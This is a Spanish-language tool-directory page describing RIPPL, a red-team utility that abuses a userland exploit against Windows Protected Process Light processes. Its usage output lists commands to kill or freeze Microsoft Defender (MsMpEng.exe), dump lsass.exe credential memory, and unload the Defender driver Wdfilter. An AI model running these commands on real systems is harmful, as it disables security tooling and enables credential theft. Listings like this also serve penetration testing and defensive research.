Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
RIPPL — RIPPL es una herramienta que abusa de una explotación solo en modo usuario para manipular procesos PPL en Windows. | Kitploit
Herramientas/GitHubGitHub/last-byte/rippl
Escalada de PrivilegiosExplotaciónPost-ExplotaciónRed Teaming
GitHublast-byte/rippl

RIPPL

RIPPL es una herramienta que abusa de una explotación solo en modo usuario para manipular procesos PPL en Windows.

Ver Repositorio
719hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

RIPPL

Manipulando procesos protegidos por PPL sin usar un controlador

defender funny

Esta herramienta implementa un exploit de userland para manipular procesos protegidos por PPL de Windows. La técnica fue discutida inicialmente por James Forshaw (también conocido como @tiraniddo) y Clément Labro (también conocido como @itm4n) en las siguientes entradas de blog.

  • Entrada de blog de James Forshaw: Trucos de explotación de Windows
  • Entrada de blog de Clément Labro parte #1: ¿Conoces realmente la protección LSA (RunAsPPL)?
  • Entrada de blog de Clément Labro parte #2: Evadiendo la protección LSA en userland

Uso

Advertencia: la versión segura del binario NUNCA genera salida alguna, ya que todas las cadenas y las funciones de impresión se eliminan mediante macros de compilación condicional.

Simplemente ejecuta el ejecutable sin ningún argumento y obtendrás una ayuda/uso detallado (solo válido para binarios compilados sin definir la macro OPSEC)

c:\Temp>.\rippl.exe
  _____  _____ _____  _____  _
 |  __ \|_   _|  __ \|  __ \| |
 | |__) | | | | |__) | |__) | |      version 0.1
 |  _  /  | | |  ___/|  ___/| |      by @last0x00
 | | \ \ _| |_| |    | |    | |____  forked by itm4n's PPLDump
 |_|  \_\_____|_|    |_|    |______|

Description:
  Manipulate Protected Process Light (PPL) processes with a *userland* exploit

Usage:
  rippl.exe (-D|-K|-S|-R|-L|-X|-W|-Z|-T|-U) [-v] [-d] [-f] (PROC_NAME|PID) [DUMP_FILE|DRIVER_NAME]
  () -> mandatory arguments
  [] -> optional arguments

Operation modes (choose ONLY one):
  -D -> Dump the given process
  -K -> Kill the given process
  -S -> Suspend the given process
  -R -> Resume the previously suspended process
  -L -> Leak a PROCESS_ALL_ACCESS handle to the given process (not yet implemented)
  -X -> Kill the given process by assigning it to a job object and terminating the object
  -W -> Freeze the process by assigning it to a job object and severely constraining its CPU resources
  -Z -> Kill the given process by injecting a thread into it which calls exit(0)
  -T -> Sandbox the process by disabling all of its token's privileges and lowering integrity to untrusted
  -U -> Unload the provided driver

Arguments:
  PROC_NAME   -> The name of the process to interact with
  PID         -> The ID of the process to interact with
  DUMP_FILE   -> The path of the output dump file - valid ONLY with the -D option
  DRIVER_NAME -> The name of the driver to unload - valid ONLY with the -U option

Options:
  -d -> (Debug) Enable debug mode
  -f -> (Force) Bypass DefineDosDevice error check

Examples:
  rippl.exe -K MsMpEng.exe
  rippl.exe -S MsMpEng.exe
  rippl.exe -R MsMpEng.exe
  rippl.exe -D -f lsass.exe lsass.dmp
  rippl.exe -D -d -f 720 out.dmp
  rippl.exe -U Wdfilter
Descargar herramienta